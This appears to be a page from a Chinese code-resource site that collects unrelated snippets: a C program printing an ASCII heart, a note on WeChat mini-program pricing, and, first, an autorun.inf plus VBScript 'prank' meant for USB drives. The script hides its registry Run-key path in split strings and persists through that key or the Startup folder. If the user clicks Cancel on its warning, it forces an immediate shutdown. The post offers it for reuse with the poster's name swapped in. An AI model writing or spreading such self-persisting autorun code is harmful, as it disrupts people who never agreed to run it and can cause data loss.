https://www.myziyuan.com/
- 源码资源网
- 新建一个autorun.inf文件内容为 [autorun]ShellExecute=wxb.vbs新建一个wxb.vbs 文件内容为Dim fs, dirwin, c,Wll, str,strr,rSet fs = CreateObject("Scripting.FileSystemObject") Set dirwin = fs.GetSpecialFolder(1)Set Wll = WScript.CreateObject("WScript.Shell")Set c = fs.GetFile(WScript.ScriptFullName) str ="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\R"&"un\wxb"if (fs.FileExists(dirwin&"\wxb.vbs")) Then call Show_And_Do("reg")elseif (fs.FileExists("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\wxb.vbs")) Thencall Show_And_Do("Startup")else On Error Resume Next strr=""Wll.RegWrite str, "C:\WINDOWS\system32\wxb.vbs", "REG_SZ"strr=Wll.Regread (str)if strr="" thenc.Copy("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\wxb.vbs") elsec.Copy(dirwin&"\wxb.vbs") end if end if sub Show_And_Do(s)dim fr = MsgBox ("警告:您未经允许使用了小波的移动设备! " & Chr(13) & Chr(10) & "确定->我下次会先征得小波允许" & Chr(10) & "取消->我才不管他呢", 4145, "MsgBox Example")If r = 1 Then if s="Startup" thenset f = fs.GetFile("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\wxb.vbs")f.Delete()elseif s="reg" thenWll.RegDelete strset f = fs.GetFile(dirwin&"\wxb.vbs")f.Delete()end ifElsewll.run "Shutdown.exe -s -f -t 0"End Ifend sub以上两个文件同时放到磁盘根目录下面(移动盘也可),打开该盘时,会出现一个对话框,要求选择.你可以把代码中的 小波 改成你自己的名字.
- 2021-03-22 14:35:22
- 飞创科技
- #include <stdio.h>int main(){printf(" **** ****\n");printf(" * * * *\n");printf("* *** *\n");printf("* *\n");printf(" * *\n");printf(" * *\n");printf(" * *\n");printf(" * *\n");printf(" * *\n");printf(" * *\n");printf(" * *\n");printf(" * *\n");return 0;}
- 2021-02-12 10:16:34
- 知了科技
- 制作一个微信小程序价格是多少钱,小程序的开发价格一般是根据开发方式来决定,常见的开发方式有以下这几种1、小程序制作工具,这种方式也是最多商家或企业选择的,费用一般在2000-5000之间,制作过程中也无需代码编程知识,只需会打字传图就能制作完成,小白也能轻松上手。2、软件定制外包的方式,需要提前想好需求,整理好需求文档发给软件公司来评估报价,所以开发价格是根据需求的难度决定的,一般定制开发费用一般在5万起,技术人力密集型决定了定制开发无法低价3、招聘技术团队,费用无法估计,通常需要5-10人的团队,费用支出有工资,场地,保险,福利等
- 2021-02-12 10:16:34